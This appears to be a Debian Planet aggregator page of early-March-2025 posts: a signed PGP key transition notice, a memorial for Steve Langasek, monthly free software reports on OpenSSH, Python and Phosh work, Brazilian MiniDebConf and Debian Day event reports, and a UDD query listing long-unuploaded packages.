March 02, 2025

Lisandro Damián Nicanor Pérez Meyer

PGP/GPG transition from 0x6286A7D0 to 0xB48C1072

I am currently transitioning my PGP/GPG key from D/4096 0x12DDFA84AC23B2BBF04B313CAB645F406286A7D0 to D/4096 0xA94C9FBFA49AA7CD4F40BB9F5E9030CCB48C1072.

Let's put this in plain text, signed with both keys:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

I am currently transitioning my GPG/GPG key from D/4096 0x12DDFA84AC23B2BBF04B313CAB645F406286A7D0 to D/4096 0xA94C9FBFA49AA7CD4F40BB9F5E9030CCB48C1072.

This file is first signed with the new key and then with the old one.

- -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEqUyfv6Sap81PQLufXpAwzLSMEHIFAmfE6RwACgkQXpAwzLSM
EHJpUBAAwMAbOwGcRiuX/aBjqDMA9HerRgimNWE9xA35Asg3F+A5/AFrBo+BDng3
jviCGxR6YdicSLZptaScLuRnqG1i/OcochGDxvHYVQ9I/G9SuHB7ylqD7zDnO5pw
Lldwx9jovkszgXMC+vs1E9tQ4vpuWNQ1I7q90rdikywhvNdNs8XUSCUNCLol5fzm
u64hcKex3pwt7wYs6TxtgO5DLpp//5Z6NoZ5f/esC0837zqy5Py6+7scN3tgRmXj
SyALlhfOCsy4+v22K5xk0VNelEWUg+VKqgMjPYbEfGQ3e4LXId6gGlKF+OuXCJX5
Eqi2leO/O3c+1MZ8LMh3YQft1/TmYktASMTdwV7Y87qMgVkXsJqIvw8d9VNlZvET
B3MMsuPK9VNKCokbSiHwB2ZQR235Hq6LPrBfMPnoVb5QzUgIk8Kz92wM3NWVAjzE
oj/660SZ7SfbBi6qmQyMjYKSKN+kSZazQfoUZo0fK1Y1mywN/XkeeV+gq/ZiYPhI
QLbjEfoeHEVcufgQCU0PvUuKr/+ud8BAwdH/9YWxYnObAzXFxgOJ9AvDqKxbD+rw
MVXCU4xMtNHHDqgZ+pSdB0br/bYtIqh1YsFfHw16lUgj9lcmfnujhl+h700pob6d
oArO0Bjb0bM9PTRRAn3CMiz2UeerBzY6gvaSnO3oBQc/UAx3RgA=
=r9Sr
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEEt36hKwjsrvwSzE8q2RfQGKGp9AFAmfE6U8ACgkQq2RfQGKG
p9DEWA/+N1AtaPwVGRi3OTcC+mzjjVd3oB4H4E80559FCbWQLvbnlazCTgdVHxp5
Pjlm4I/hKYSaWNirUvE7Dq7LNWYYhZRBunXc/VrrX2fkxj99D+F9co5fXYO3fsQn
vlz1UZzq8OrvWJo5Cv65CkblQReB31SNY//gBk5SjaeL4bnH3qOLCn6gGrqIgkyj
qb8vQzk9ssb0b2P2hNJlkYQA20LUshyShyfnaAJuEtmDYp3F3fWfuyTPEznJZ0AJ
efxfkYqQIznY36Om8dW0ec5LI3Xb+Obj4ccfNhWBfVG4RKruKHEhQCDtZbMSGPDn
ns4yOl5cqbN/2Gqa/Ww+LafWPsa73NYQNDOIM2XhVFLf2wikGMnb2bew3iZrEBo5
BORucyd1sBFsdD2tXAZEaXBpuCU+7mI9bJz9Co2+NWf1+IDaKyvJSgl7cQxuUtd4
tp7mDB7Czf4yDK+QHqeWY46DtU0dlDpyOt2IijkJzhH6nL9cfo+W4JUFJrhd42Tr
fRqjt7WeGrauX+d8wfvVV/KFrCkuw51ojLAtztvH7iwDP85wAOu95AlT1kT4ZwlE
uEmdgtYE3GGwQKP2osndJZwic/tZuKrm7p5xFYJr8N95nsRNlk1ia4EkyvQbe49m
2+JHO8Q0EjUGfV2+bSw4Eupi6qEgWp2s4sIGpHEGzWYfNqmozWE=
=A5kI
-----END PGP SIGNATURE-----

The above can be found as a file here.
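
To check the statement yourself, something like the following should work (a minimal sketch, assuming a keyserver is configured in gpg and the statement was saved as transition.txt):

# fetch both the old and the new key by their full fingerprints
gpg --recv-keys 0x12DDFA84AC23B2BBF04B313CAB645F406286A7D0 \
    0xA94C9FBFA49AA7CD4F40BB9F5E9030CCB48C1072

# verify the outer (old key) signature and unwrap the inner message
gpg --decrypt transition.txt > inner.txt

# verify the inner (new key) signature
gpg --verify inner.txt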

02 March, 2025 11:16PM by Lisandro Damián Nicanor Pérez Meyer

Jonathan McDowell

RIP: Steve Langasek

[I’d like to stop writing posts like this. I’ve been trying to work out what to say now for nearly 2 months (writing the mail to -private to tell the Debian project about his death is one of the hardest things I’ve had to write, and I bottled out and wrote something that was mostly just factual, because it wasn’t the place), and I’ve decided I just have to accept this won’t be the post I want it to be, but posted is better than languishing in drafts.]

Last weekend I was in Portland, for the Celebration of Life of my friend Steve, who sadly passed away at the start of the year. It wasn’t entirely unexpected, but that doesn’t make it any easier.

I’ve struggled to work out what to say about Steve. I’ve seen many touching comments from others in Debian about their work with him, but what that’s mostly brought home to me is that while I met Steve through Debian, he was first and foremost my friend rather than someone I worked with in Debian. And so everything I have to say is more about that friendship (and thus feels a bit self-centred).

My first memory of Steve is getting lost with him in Porto Alegre, Brazil, during DebConf4. We’d decided to walk to a local mall to meet up with some other folk (I can’t recall how they were getting there, but it wasn’t walking), ended up deep in conversation (ISTR it was about shared library transitions), and then it took a bit longer than we expected. I don’t know how that managed to cement a friendship (neither of us saw it as the near death experience others feared we’d had), but it did.

Unlike others I never texted Steve much; we’d occasionally chat on IRC, but nothing major. That didn’t seem to matter when we actually saw each other in person though; we just picked up like we’d seen each other the previous week. DebConf became a recurring theme of when we’d see each other. Even outside DebConf we went places together. The first time I went somewhere in the US that wasn’t the Bay Area, it was to Portland to see Steve. He, and his family, came to visit me in Belfast a couple of times, and I did a road trip from Dublin to Cork with him. He took me to a volcano.

Steve saw injustice in the world and actually tried to do something about it. I still have a copy of the US constitution sitting on my desk that he gave me. He made me want to be a better person.

The world is a worse place without him in it, and while I am better for having known him, I am sadder for the fact he’s gone.

02 March, 2025 04:56PM

Colin Watson

Free software activity in February 2025

Most of my Debian contributions this month were sponsored by Freexian.

You can also support my work directly via Liberapay.

OpenSSH

OpenSSH upstream released 9.9p2 with fixes for CVE-2025-26465 and CVE-2025-26466. I got a heads-up on this in advance from the Debian security team, and prepared updates for all of testing/unstable, bookworm (Debian 12), bullseye (Debian 11), buster (Debian 10, LTS), and stretch (Debian 9, ELTS). jessie (Debian 8) is also still in ELTS for a few more months, but wasn’t affected by either vulnerability.

Although I’m not particularly active in the Perl team, I fixed a libnet-ssleay-perl build failure because it was blocking openssl from migrating to testing, which in turn was blocking the above openssh fixes.

I also sent a minor sshd -T fix upstream, simplified a number of autopkgtests using the newish Restrictions: needs-sudo facility, and prepared for removing the obsolete slogin symlink.
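
For reference, needs-sudo is just one extra line in a test's metadata. A hypothetical debian/tests/control stanza might look like this (the test name and dependencies are made up):

Tests: regress-as-user
Depends: @, openssh-server
Restrictions: needs-sudo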

PuTTY

I upgraded to the new upstream version 0.83.

GCC 15 build failures

I fixed build failures with GCC 15 in a few packages:

Python team

A lot of my Python team work is driven by its maintainer dashboard. Now that we’ve finished the transition to Python 3.13 as the default version, and inspired by a recent debian-devel thread started by Santiago, I thought it might be worth spending a bit of time on the “uscan error” section. uscan typically scrapes upstream web sites to figure out whether new versions are available, so it’s easy for its configuration to become outdated or broken (there’s a sample watch file after the list below). Most of this work is pretty boring, but it can often reveal situations where we didn’t even realize that a Debian package was out of date. I fixed these packages:

  • cssutils (this in particular was very out of date due to a new and active upstream maintainer since 2021)
  • django-assets
  • django-celery-email
  • django-sass
  • django-yarnpkg
  • json-tricks
  • mercurial-extension-utils
  • pydbus
  • pydispatcher
  • pylint-celery
  • pyspread
  • pytest-pretty
  • python-apptools
  • python-django-libsass (contributed a packaging fix upstream in passing)
  • python-django-postgres-extra
  • python-django-waffle
  • python-ephemeral-port-reserve
  • python-ifaddr
  • python-log-symbols
  • python-msrest
  • python-msrestazure
  • python-netdisco
  • python-pathtools
  • python-user-agents
  • sinntp
  • wchartype
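
For context, the configuration uscan reads is the debian/watch file. A typical one for a GitHub-hosted upstream looks something like this (a sketch for a hypothetical project called example):

version=4
opts=filenamemangle=s/.+\/v?(\d\S+)\.tar\.gz/example-$1.tar.gz/ \
  https://github.com/example/example/tags .*/v?(\d\S+)\.tar\.gz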

I upgraded these packages to new upstream versions:

  • cssutils (contributed a packaging tweak upstream)
  • django-iconify
  • django-sass
  • domdf-python-tools
  • extra-data (fixing a numpy 2.0 failure)
  • flufl.i18n
  • json-tricks
  • jsonpickle
  • mercurial-extension-utils
  • mod-wsgi
  • nbconvert
  • orderly-set
  • pydispatcher (contributed a Python 3.12 fix upstream)
  • pylint
  • pytest-rerunfailures
  • python-asyncssh
  • python-box (contributed a packaging fix upstream)
  • python-charset-normalizer
  • python-django-constance
  • python-django-guid
  • python-django-pgtrigger
  • python-django-waffle
  • python-djangorestframework-simplejwt
  • python-formencode
  • python-holidays (contributed a test fix upstream)
  • python-legacy-cgi
  • python-marshmallow-polyfield (fixing a test failure)
  • python-model-bakery
  • python-mrcz (fixing a numpy 2.0 failure)
  • python-netdisco
  • python-npe2
  • python-persistent
  • python-pkginfo (fixing a test failure)
  • python-proto-plus
  • python-requests-ntlm
  • python-roman
  • python-semantic-release
  • python-setproctitle
  • python-stdlib-list
  • python-trustme
  • python-typeguard (fixing a test failure)
  • python-tzlocal
  • pyzmq
  • setuptools-scm
  • sqlfluff
  • stravalib
  • tomopy
  • trove-classifiers
  • xhtml2pdf (fixing CVE-2024-25885)
  • xonsh
  • zodbpickle
  • zope.deprecation
  • zope.testrunner

In bookworm-backports, I updated python-django to 3:4.2.18-1 (issuing BSA-121) and added new backports of python-django-dynamic-fixture and python-django-pgtrigger, all of which are dependencies of debusine.

I went through all the build failures related to python-click 8.2.0 (which was confusingly tagged but not fully released upstream) and posted an analysis.

I fixed or helped to fix various other build/test failures:

I dropped support for the old setup.py ftest command from zope.testrunner upstream.

I fixed various odds and ends of bugs:

Installer team

Following up on last month, I merged and uploaded Helmut’s /usr-move fix.

02 March, 2025 01:49PM by Colin Watson

March 01, 2025

Debian Brasil

MiniDebConf Belo Horizonte 2024 - a brief report


by Paulo Henrique de Lima Santana (phls)

From April 27th to 30th, 2024, MiniDebConf Belo Horizonte 2024 was held at the Pampulha Campus of UFMG - Federal University of Minas Gerais, in Belo Horizonte city.

MiniDebConf BH 2024 banners

This was the fifth time that a MiniDebConf (as an exclusive in-person event about Debian) took place in Brazil. Previous editions were in Curitiba (2016, 2017, and 2018) and in Brasília in 2023. We have also had MiniDebConf editions held within Free Software events such as FISL and Latinoware, as well as other online events. See our event history.

In parallel with MiniDebConf, FLISOL - the Latin American Free Software Installation Festival - took place on the 27th (Saturday). It's the largest event in Latin America promoting Free Software, and it has been held since 2005 simultaneously in several cities.

MiniDebConf Belo Horizonte 2024 was a success (as were previous editions) thanks to the participation of everyone, regardless of their level of knowledge about Debian. We value the presence of both beginner users who are familiarizing themselves with the system and the official project developers. The spirit of welcome and collaboration was present throughout the event.

MiniDebConf BH 2024 flisol

2024 edition numbers

During the four days of the event, several activities took place for all levels of users and collaborators of the Debian project. The official schedule was composed of:

  • 6 rooms in parallel on Saturday;
  • 2 auditoriums in parallel on Monday and Tuesday;
  • 30 talks/BoFs at all levels;
  • 5 workshops for hands-on activities;
  • 9 lightning talks on general topics;
  • 1 live electronics performance with Free Software;
  • an install fest to install Debian on attendees' laptops;
  • a BSP (Bug Squashing Party);
  • uploads of new or updated packages.

MiniDebConf BH 2024 palestra

The final numbers for MiniDebConf Belo Horizonte 2024 show that we had a record number of participants.

  • Total people registered: 399
  • Total attendees in the event: 224

Of the 224 participants, 15 were official Brazilian contributors: 10 DDs (Debian Developers) and 5 DMs (Debian Maintainers), in addition to several unofficial contributors.

The organization was carried out by 14 people who started working at the end of 2023, including Prof. Loïc Cerf from the Computing Department who made the event possible at UFMG, and 37 volunteers who helped during the event.

As MiniDebConf was held at UFMG facilities, we had the help of more than 10 University employees.

See the list with the names of people who helped in some way in organizing MiniDebConf Belo Horizonte 2024.

The difference between the number of people registered and the number of attendees is probably explained by the fact that there is no registration fee, so people who decide not to attend suffer no financial loss.

The 2024 edition of MiniDebConf Belo Horizonte was truly grand and shows the result of the constant efforts made over the last few years to attract more contributors to the Debian community in Brazil. With each edition the numbers only increase: more attendees, more activities, more rooms, and more sponsors/supporters.

MiniDebConf BH 2024 grupo

MiniDebConf BH 2024 grupo

Activities

The MiniDebConf schedule was intense and diverse. On the 27th, 29th and 30th (Saturday, Monday and Tuesday) we had talks, discussions, workshops and many practical activities.

MiniDebConf BH 2024 palestra

On the 28th (Sunday), the Day Trip took place, a day dedicated to sightseeing around the city. In the morning we left the hotel and went, on a chartered bus, to the Belo Horizonte Central Market. People took the opportunity to buy various things such as cheeses, sweets, cachaças, and souvenirs, as well as to taste some local foods.

MiniDebConf BH 2024 mercado

After a 2-hour tour of the Market, we got back on the bus and hit the road for lunch at a restaurant serving typical Minas Gerais food.

MiniDebConf BH 2024 palestra

With everyone well fed, we returned to Belo Horizonte to visit the city's main tourist attraction: Lagoa da Pampulha and Capela São Francisco de Assis, better known as Igrejinha da Pampulha.

MiniDebConf BH 2024 palestra

We went back to the hotel, and the day ended in the hacker space that we set up in the events room for people to chat, package, and eat pizza.

MiniDebConf BH 2024 palestra

Crowdfunding

For the third time we ran a crowdfunding campaign, and it was incredible how people contributed! The initial goal was to raise the amount equivalent to a gold tier, R$ 3,000.00. When we reached this goal, we defined a new one, equivalent to one gold tier + one silver tier (R$ 5,000.00). And again we achieved this goal. So we proposed as a final goal the value of a gold + silver + bronze tier, which would be equivalent to R$ 6,000.00. The result was that we raised R$ 7,239.65 (~ USD 1,400) with the help of more than 100 people!

Thank you very much to the people who contributed any amount. As a thank you, we list the names of the people who donated.

MiniDebConf BH 2024 doadores

Food, accommodation and/or travel grants for participants

Each edition of MiniDebConf has brought some innovation, or some different benefit for the attendees. In this year's edition in Belo Horizonte, as with DebConfs, we offered bursaries for food, accommodation and/or travel to help people who would like to come to the event but would need some kind of help to do so.

In the registration form, we included the option for the person to request a food, accommodation and/or travel bursary, but to do so, they would have to identify themselves as a contributor (official or unofficial) to Debian and write a justification for the request.

Number of people benefited:

  • Food: 69
  • Accommodation: 20
  • Travel: 18

The food bursary provided lunch and dinner every day. Lunches also covered attendees who live in Belo Horizonte and the surrounding region, while dinners were covered for attendees who also received accommodation and/or travel bursaries. Accommodation was provided at the BH Jaraguá Hotel, and travel grants covered airplane or bus tickets, or fuel for those who came by car or motorbike.

Much of the money to fund the bursaries came from the Debian Project, mainly for travel. We sent a budget request to the then Debian Project Leader, Jonathan Carter, and he promptly approved our request.

In addition to this event budget, the leader also approved individual requests sent by some DDs who preferred to request directly from him.

The experience of offering the bursaries was really good because it allowed several people to come from other cities.

MiniDebConf BH 2024 grupo

Photos and videos

You can watch recordings of the talks at the links below:

Thanks

We would like to thank all the attendees, organizers, volunteers, sponsors and supporters who contributed to the success of MiniDebConf Belo Horizonte 2024.

MiniDebConf BH 2024 grupo

Sponsors

Gold:

Silver:

Bronze:

Organizers

01 March, 2025 05:40PM

Debian Day 2024 in Santa Maria - Brazil


by Andrew Gonçalves

Debian Day in Santa Maria - RS 2024 was held after a 5-year hiatus since the previous edition of the event. It took place on the morning of August 16, in the Blue Hall of the Franciscan University (UFN), with support from the Debian community and the Computing Practices Laboratory of UFN.

The event was attended by students from all semesters of the Computer Science, Digital Games, and Information Systems courses, and we had the opportunity to talk to the participants.

Around 60 students attended a lecture introducing them to Free and Open Source Software, Linux, and the Debian project, covering both the project's philosophy and how it works in practice, as well as the opportunities that being part of Debian has opened up for participants.

After the talk, a packaging demonstration was given by local DD Francisco Vilmar, who demonstrated in practice how software packaging works in Debian.

I would like to thank all the people who helped us:

  • Debian Project
  • Professor Ana Paula Canal (UFN)
  • Professor Sylvio André Garcia (UFN)
  • Laboratory of Computing Practices
  • Francisco Vilmar (local DD)

And thanks to all the participants who attended this event asking intriguing questions and taking an interest in the world of Free Software.

Photos:

DD em Santa Maria 1 DD em Santa Maria 2 DD em Santa Maria 3 DD em Santa Maria 4

01 March, 2025 05:39PM

Debian Day 2024 in Pouso Alegre - Brazil


by Thiago Pezzo and Giovani Ferreira

Local celebrations of Debian Day 2024 also happened in Pouso Alegre, MG, Brazil (https://www.openstreetmap.org/relation/315431). This year we managed to organize two days of lectures!

On the 14th of August 2024, Wednesday morning, we were at the Federal Institute of Education, Science and Technology of the South of Minas Gerais (https://portal.ifsuldeminas.edu.br/index.php) (IFSULDEMINAS), Pouso Alegre campus. We gave an introductory presentation on the Debian Project, its operating system and its community, to all three years of the Technical Course in Informatics (professional high school). The event was restricted to IFSULDEMINAS students, and we talked to around 60 people.

On August 17th, 2024, a Saturday morning, we held the event open to the community at the University of the Sapucaí Valley (Univás), with the institutional support of the Information Systems Course. We spoke about the Debian Project with Giovani Ferreira (Debian Developer); about the Debian pt_BR translation team with Thiago Pezzo; about everyday experiences using free software with Virginia Cardoso; and about how to set up a development environment ready for production using Debian and Docker with Marcos António dos Santos. After the lectures, snacks, coffee and cake were served, while the participants talked, asked questions and shared experiences.

We would like to thank all the people who have helped us:

  • Michelle Nery (IFSULDEMINAS) and André Martins (UNIVÁS) for the help with the local organization
  • Paulo Santana (Debian Brazil) for the general organization
  • Virginia Cardoso, Giovani Ferreira, Marco António and Thiago Pezzo for the lectures
  • And a special thanks to all of you who participated in our celebration

Some pictures from Pouso Alegre:

Presentation at IFSULDEMINAS Pouso Alegre campus 1 Presentation at IFSULDEMINAS Pouso Alegre campus 2 Presentation at UNIVÁS Fátima campus 1 Presentation at UNIVÁS Fátima campus 2 Presentation at UNIVÁS Fátima campus 3 Presentation at UNIVÁS Fátima campus 4

01 March, 2025 05:39PM

Debian Day 30 years in São Carlos - Brazil


by Carlos Henrique Lima Melara (Charles)

This year's Debian Day was a pretty special one: we are celebrating 30 years! Given the importance of this event, the Brazilian community planned a very special week. Instead of only local gatherings, we had a week of online talks streamed via Debian Brazil's YouTube channel (soon the recordings will be uploaded to Debian's PeerTube instance). Nonetheless, the local celebrations happened around the country, and I organized one in São Carlos with the help of GELOS, the FLOSS group at the University of São Paulo. The event happened on August 19th and went on the whole afternoon. We had some talks about Debian and free software (see the table below), a coffee break where we had the chance to talk, and finished with a group photo (check this one and many others below). Actually, it wasn't the end: we carried on the conversation about Debian and free software in a local bar :-)

We had around 30 people at the event and reached a greater audience via announcements in the university's press releases and emails sent to our Brazilian mailing lists. You can check some of them below.

Time  | Author                          | Title
------|---------------------------------|------
14:10 | GELOS                           | Intro to GELOS
14:30 | Carlos Melara (Charles)         | A ~~not so~~ Brief Introduction to the Debian Project
15:15 | Guilherme Paixão                | Debian and the Free Culture
15:45 | zé                              | Free Software: the paths to a free life
16:15 | --                              | Coffee Break
17:15 | Prof. Dr. Francisco José Monaco | The FOSS Ecosystem and You

Here are some photos taken during the event!

Preparation for Debian Day Getting things ready for the event.

Intro to GELOS Intro to GELOS talk.

Debian intro A ~~not so~~ Brief Introduction to the Debian Project talk.

Everyone knows Debian Everyone already knew Debian!

Free software Debian and the Free Culture talk

Auditorium People in the auditorium space.

Free software Free Software: the paths to a free life talk

Coffee Break Coffee Break.

FOSS Ecosystem The FOSS Ecosystem and You talk.

Group photo Group photo.

Celebration afterwards Celebration goes on in the bar.

01 March, 2025 05:39PM

Debian Day 30 years online in Brazil


by Paulo Henrique de Lima Santana (phls)

In 2023 the traditional Debian Day was celebrated in a special way; after all, on August 16th Debian turned 30 years old!

To celebrate this special milestone in Debian's life, the Debian Brasil community organized a week of online talks from August 14th to 18th. The event was named Debian 30 years.

Two talks were held per night, from 7:00 pm to 10:00 pm, streamed on the Debian Brasil channel on YouTube, totaling 10 talks. The recordings are also available on the Debian Brasil channel on PeerTube. We had the participation of 9 DDs, 1 DM, and 3 contributors across 10 activities. The live audience varied a lot, and the peak was during the preseed talk with Eriberto Mota, when we had 47 people watching.

Thank you to all participants for the contribution you made to the success of our event.

  • Antonio Terceiro
  • Aquila Macedo
  • Charles Melara
  • Daniel Lenharo de Souza
  • David Polverari
  • Eriberto Mota
  • Giovani Ferreira
  • Jefferson Maier
  • Lucas Kanashiro
  • Paulo Henrique de Lima Santana
  • Sergio Durigan Junior
  • Thais Araujo
  • Thiago Andrade

Below are the photos of each activity:

Nova geração: uma entrevista com iniciantes no projeto Debian

Instalação personalizada e automatizada do Debian com preseed

Manipulando patches com git-buildpackage

debian.social: Socializando Debian do jeito Debian

Proxy reverso com WireGuard

Celebração dos 30 anos do Debian!

Instalando o Debian em disco criptografado com LUKS

O que a equipe de localização já conquistou nesses 30 anos

Debian - Projeto e Comunidade!

Design Gráfico e Software livre, o que fazer e por onde começar

01 March, 2025 05:39PM

Guido Günther

Free Software Activities February 2025

Another short status update of what happened on my side last month. One larger block was the Phosh 0.45 release; reviews also took a considerable amount of time. On the fun side, debugging bananui and coming up with a fix in phoc, as well as setting up a small GSM network using osmocom to test more Cell Broadcast thingies, were likely the most fun parts.

phosh

  • Release 0.45~beta1, 0.45~rc1, 0.45.0
  • Don't hide player when track is stopped (MR) - helps with e.g. Shortwave
  • Fetch cover art via http (MR)
  • Update CI images (MR)
  • Robustify symbol file generation (MR)
  • Handle cutouts in the indicators area (MR)
  • Reduce flicker when opening overview (MR)
  • Select less noisy default background (MR)

phoc

  • Release 0.45~beta1, 0.45~rc1, 0.45.0
  • Add support for ext-foreign-toplevel-v1 (MR)
  • Keep wlroots-0.19.x in shape and add support for ext-image-copy-capture-v1 (MR)
  • Fix geometry with scale when rendering to a buffer (MR)
  • Allow to tweak log domains at runtime (MR)
  • Print more useful information on startup (MR)
  • Provide PID of toplevel for phosh (MR)
  • Improve detection for hardware keyboards (MR) (mostly to help bananui)
  • Make tests a bit more flexible (MR)
  • Use wlr_damage_ring_rotate_buffer (MR). Another prep for 0.19.x.
  • Support wp-alpha-modifier-v1 protocol (MR)

phosh-osk-stub

phosh-tour

phosh-mobile-settings

pfs

  • Add common checks and check meson files (MR)

libphosh-rs

meta-phosh

  • Add common dot files and job to check meson formatting (MR)
  • Add l10n modules to string freeze announcement (based on suggestion by Alexandre Franke) (MR)
  • Bring over mk-gitlab-rel and improve it for alpha, beta, RCs (MR)

libcmatrix

Debian

  • Upload phoc 0.45~beta1, 0.45~rc1, 0.45.0
  • Upload phosh 0.45~beta1, 0.45~rc1, 0.45.0
  • Upload feedbackd 0.7.0
  • Upload xdg-desktop-portal-phosh 0.45.0
  • Upload phosh-tour 0.45~rc1, 0.45.0
  • Upload phosh-osk-stub 0.45~rc1, 0.45.0
  • Upload phosh-mobile-settings 0.45~rc1, 0.45.0
  • phosh: Fix dependencies of library dev package (MR) (and add a test)
  • Update libphosh-rs to 0.0.6 (MR)
  • Update iio-sensor-proxy to 3.6 (MR)
  • Backport qbootctl RDONLY patch (MR) to make generating the boot image more robust
  • libssc: Update to 0.2.1 (MR)
  • dom-tools: Write errors to stderr (MR)
  • dom-tools: Use underscored version to drop the branch ~ (MR)
  • libmbim: Upload 1.31.6 to experimental (MR)
  • ModemManager: Upload 1.23.12 to experimental (MR)

gmobile

  • data: Add display-panel for Furilabs FLX1 (MR)

feedbackd

grim

  • Allow to force screen capture protocol (MR)

Wayland protocols

  • Address multiple rounds of review comments in the xdg-occlusion (now xdg-cutouts) protocol (MR)

g4music

  • Set prefs parent (MR)

wlroots

  • Backport touch up fix to 0.18 (MR)

qbootctl

  • Don't recreate all partitions on read operations (MR)

bananui-shell

  • Check for keyboard caps before using them (Patch, issue)

libssc

  • Allow for python3 as interpreter as well (MR)
  • Don't leak unprefixed symbols into ABI (MR)
  • Improve info on test failures (MR)
  • Support multiarch when loading libqrtr (MR)

ModemManager

  • Cell Broadcast: Allow to set channel list via API (MR)

Waycheck

  • Add Phosh's protocols (MR)

Bug reports

  • Support haptic feedback on Linux in Firefox (Bug)
  • Get pmOS to boot again on Nokia 2780 (Bug)

Reviews

This is not code by me, but reviews of other people's code. The list is slightly incomplete. Thanks for the contributions!

  • Debian: qcom-phone-utils rework (MR)
  • Simplify ui files (MR) - partially merged
  • calls: Implement ussd interface for ofono (MR)
  • chatty: Build docs using gi-docgen (MR)
  • chatty: Search related improvements (MR)
  • chatty: Fix crash on stuck SMS removal (MR)
  • feedbackd: stop flash when "prefer flash" is disabled (MR) - merged
  • gmobile: Support for nothingphone notch (MR)
  • iio-sensor-proxy: polkit for compass (MR) - merged
  • libcmatrix: Improved error code (MR) - merged
  • libcmatrix: Load room members is current (MR) - merged
  • libcmatrix: Start 0.0.4 cycle (MR) - merged
  • libphosh-rs: Update to 0.45~rc1 (MR) - merged
  • libphosh-rs: Update to reduced API surface (MR) - merged
  • phoc: Use color-rect for shields: (MR) - merged
  • phoc: unresponsive toplevel state (MR)
  • phoc: view: Don't multiply by scale in get_geometry_default (MR)
  • phoc: render: Fix subsurface scaling when rendering to buffer (MR)
  • phoc: render: Avoid rendering textures with alpha set to zero (MR)
  • phoc: Render a spinner on output shield (MR)
  • phosh: Manage libpohsh API version separately (MR) - merged
  • phosh: Prepare container APIs for GTK4 (MR)
  • phosh: Reduce API surface further (MR) - merged
  • phosh: Simplify UI files for GTK4 migration (MR) - merged
  • phosh: Simplify gvc-channel bar (MR) - merged
  • phosh: Simplify parent lookup (MR) - merged
  • phosh: Split out private header for LF (MR) - merged
  • phosh: Use symbols file for libphosh (MR) - merged
  • phosh: stylesheet: Improve legibility of app grid and top bar (MR)
  • several mobile-broadband-provider-info updates under (MR) - mostly merged

Help Development

If you want to support my work see donations.

Comments?

Join the Fediverse thread

01 March, 2025 01:38PM

Michael Ablassmeier

pbsav - scan backups on proxmox backup server via clamav

Little side project this weekend:

pbsav

Small utility to scan virtual machine backups on PBS via clamav.

01 March, 2025 12:00AM

February 28, 2025

Petter Reinholdtsen

Brushing up on old packages in Xiph and Debian

Since my motivation boost in the beginning of the month caused me to wrap up a new release of liboggz, I have used the same boost to wrap up new editions of libfishsound, liboggplay and libkate too. These have been tagged in upstream git, but not yet published on the Xiph download location. I am waiting for someone with access to have time to move the tarballs there, I hope it will happen in a few days. The same is the case for a minor update of liboggz too.

As I was looking at Xiph packages lacking updates, it occurred to me that there are packages in Debian that have not received a new upload in a long time. Looking for a way to identify them, I came across the ltnu script from the devscripts package. It can sort the packages maintained by a single user/group by last upload, and is useful to figure out which packages a given maintainer should have a look at. But I wanted an archive-wide summary. Based on the UDD SQL query used by ltnu, I ended up with the following command:

#!/bin/sh
# Ask the public UDD mirror for the 50 source packages in unstable
# with the oldest last upload.
env PGPASSWORD=udd-mirror psql --host=udd-mirror.debian.net --user=udd-mirror udd --command="
select source,
       max(version) as ver,
       max(date) as uploaded
from upload_history
where distribution='unstable' and
      source in (select source
                 from sources
                 where release='sid')
group by source
order by max(date) asc
limit 50;"

This will sort all source packages in Debian by upload date, and list the 50 oldest ones. The end result is a list of packages I suspect could use some attention:

           source            |           ver           |        uploaded        
-----------------------------+-------------------------+------------------------
 xserver-xorg-video-ivtvdev  | 1.1.2-1                 | 2011-02-09 22:26:27+00
 dynamite                    | 0.1.1-2                 | 2011-04-30 16:47:20+00
 xkbind                      | 2010.05.20-1            | 2011-05-02 22:48:05+00
 libspctag                   | 0.2-1                   | 2011-09-22 18:47:07+00
 gromit                      | 20041213-9              | 2011-11-13 21:02:56+00
 s3switch                    | 0.1-1                   | 2011-11-22 15:47:40+00
 cd5                         | 0.1-3                   | 2011-12-07 21:19:05+00
 xserver-xorg-video-glide    | 1.2.0-1                 | 2011-12-30 16:50:48+00
 blahtexml                   | 0.9-1.1                 | 2012-04-25 11:32:11+00
 aggregate                   | 1.6-7                   | 2012-05-01 00:47:11+00
 rtfilter                    | 1.1-4                   | 2012-05-11 12:50:00+00
 sic                         | 1.1-5                   | 2012-05-11 19:10:31+00
 kbdd                        | 0.6-4                   | 2012-05-12 07:33:32+00
 logtop                      | 0.4.3-1                 | 2012-06-05 23:04:20+00
 gbemol                      | 0.3.2-2                 | 2012-06-26 17:03:11+00
 pidgin-mra                  | 20100304-1              | 2012-06-29 23:07:41+00
 mumudvb                     | 1.7.1-1                 | 2012-06-30 09:12:14+00
 libdr-sundown-perl          | 0.02-1                  | 2012-08-18 10:00:07+00
 ztex-bmp                    | 20120314-2              | 2012-08-18 19:47:55+00
 display-dhammapada          | 1.0-0.1                 | 2012-12-19 12:02:32+00
 eot-utils                   | 1.1-1                   | 2013-02-19 17:02:28+00
 multiwatch                  | 1.0.0-rc1+really1.0.0-1 | 2013-02-19 17:02:35+00
 pidgin-latex                | 1.5.0-1                 | 2013-04-04 15:03:43+00
 libkeepalive                | 0.2-1                   | 2013-04-08 22:00:07+00
 dfu-programmer              | 0.6.1-1                 | 2013-04-23 13:32:32+00
 libb64                      | 1.2-3                   | 2013-05-05 21:04:51+00
 i810switch                  | 0.6.5-7.1               | 2013-05-10 13:03:18+00
 premake4                    | 4.3+repack1-2           | 2013-05-31 12:48:51+00
 unagi                       | 0.3.4-1                 | 2013-06-05 11:19:32+00
 mod-vhost-ldap              | 2.4.0-1                 | 2013-07-12 07:19:00+00
 libapache2-mod-ldap-userdir | 1.1.19-2.1              | 2013-07-12 21:22:48+00
 w9wm                        | 0.4.2-8                 | 2013-07-18 11:49:10+00
 vish                        | 0.0.20130812-1          | 2013-08-12 21:10:37+00
 xfishtank                   | 2.5-1                   | 2013-08-20 17:34:06+00
 wap-wml-tools               | 0.0.4-7                 | 2013-08-21 16:19:10+00
 ttysnoop                    | 0.12d-6                 | 2013-08-24 17:33:09+00
 libkaz                      | 1.21-2                  | 2013-09-02 16:00:10+00
 rarpd                       | 0.981107-9              | 2013-09-02 19:48:24+00
 libimager-qrcode-perl       | 0.033-1.2               | 2013-09-04 21:06:31+00
